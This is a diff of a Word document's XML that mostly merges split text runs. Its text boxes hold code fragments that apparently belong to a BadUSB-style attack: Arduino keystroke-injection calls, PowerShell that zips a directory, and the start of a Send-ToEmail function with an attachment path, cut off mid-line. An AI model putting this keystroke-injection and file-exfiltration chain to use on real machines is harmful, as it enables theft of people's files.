-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>8000);</w:t>
+                              <w:t xml:space="preserve">  delay(8000);</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -27767,25 +25323,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27802,25 +25340,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>8000);</w:t>
+                        <w:t xml:space="preserve">  delay(8000);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27854,25 +25374,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -27889,25 +25391,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>8000);</w:t>
+                        <w:t xml:space="preserve">  delay(8000);</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -28226,25 +25710,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -28261,25 +25727,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>1000);</w:t>
+                              <w:t xml:space="preserve">  delay(1000);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -28313,25 +25761,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -28348,25 +25778,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -28400,25 +25812,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -28435,25 +25829,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -28506,25 +25882,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28541,25 +25899,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>1000);</w:t>
+                        <w:t xml:space="preserve">  delay(1000);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28593,25 +25933,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28628,25 +25950,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28680,25 +25984,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -28715,25 +26001,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -28995,25 +26263,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -29030,25 +26280,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -29082,25 +26314,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -29117,25 +26331,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>delay(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>100);</w:t>
+                              <w:t xml:space="preserve">  delay(100);</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -29169,25 +26365,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">  </w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>typeKey(</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>KEY_RETURN);</w:t>
+                              <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -29240,25 +26418,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -29275,25 +26435,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -29327,25 +26469,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -29362,25 +26486,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>delay(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>100);</w:t>
+                        <w:t xml:space="preserve">  delay(100);</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -29414,25 +26520,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">  </w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>typeKey(</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>KEY_RETURN);</w:t>
+                        <w:t xml:space="preserve">  typeKey(KEY_RETURN);</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -30162,25 +27250,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>Add-Type -assembly "</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>system.io.compression</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>.filesystem"</w:t>
+                              <w:t>Add-Type -assembly "system.io.compression.filesystem"</w:t>
                             </w:r>
                           </w:p>
                           <w:p>
@@ -30247,25 +27317,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>[</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>io.compression</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>.zipfile]::CreateFromDirectory($Source, $destination)</w:t>
+                              <w:t>[io.compression.zipfile]::CreateFromDirectory($Source, $destination)</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -30301,25 +27353,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>Add-Type -assembly "</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>system.io.compression</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>.filesystem"</w:t>
+                        <w:t>Add-Type -assembly "system.io.compression.filesystem"</w:t>
                       </w:r>
                     </w:p>
                     <w:p>
@@ -30386,25 +27420,7 @@
                           <w:sz w:val="20"/>
                           <w:szCs w:val="20"/>
                         </w:rPr>
-                        <w:t>[</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramStart"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>io.compression</w:t>
-                      </w:r>
-                      <w:proofErr w:type="gramEnd"/>
-                      <w:r>
-                        <w:rPr>
-                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                          <w:sz w:val="20"/>
-                          <w:szCs w:val="20"/>
-                        </w:rPr>
-                        <w:t>.zipfile]::CreateFromDirectory($Source, $destination)</w:t>
+                        <w:t>[io.compression.zipfile]::CreateFromDirectory($Source, $destination)</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -31222,271 +28238,7 @@
                                 <w:sz w:val="20"/>
                                 <w:szCs w:val="20"/>
                               </w:rPr>
-                              <w:t>function Send-ToEmail([string]$email, [string]$</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramStart"/>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t>attachmentpath){</w:t>
-                            </w:r>
-                            <w:proofErr w:type="gramEnd"/>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                            </w:pPr>
-                          </w:p>
-                          <w:p>
-                            <w:pPr>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                            </w:pPr>
-                            <w:r>
-                              <w:rPr>
-                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                                <w:sz w:val="20"/>
-                                <w:szCs w:val="20"/>
-                              </w:rPr>
-                              <w:t xml:space="preserve">    $message = new-object </w:t>
-                            </w:r>
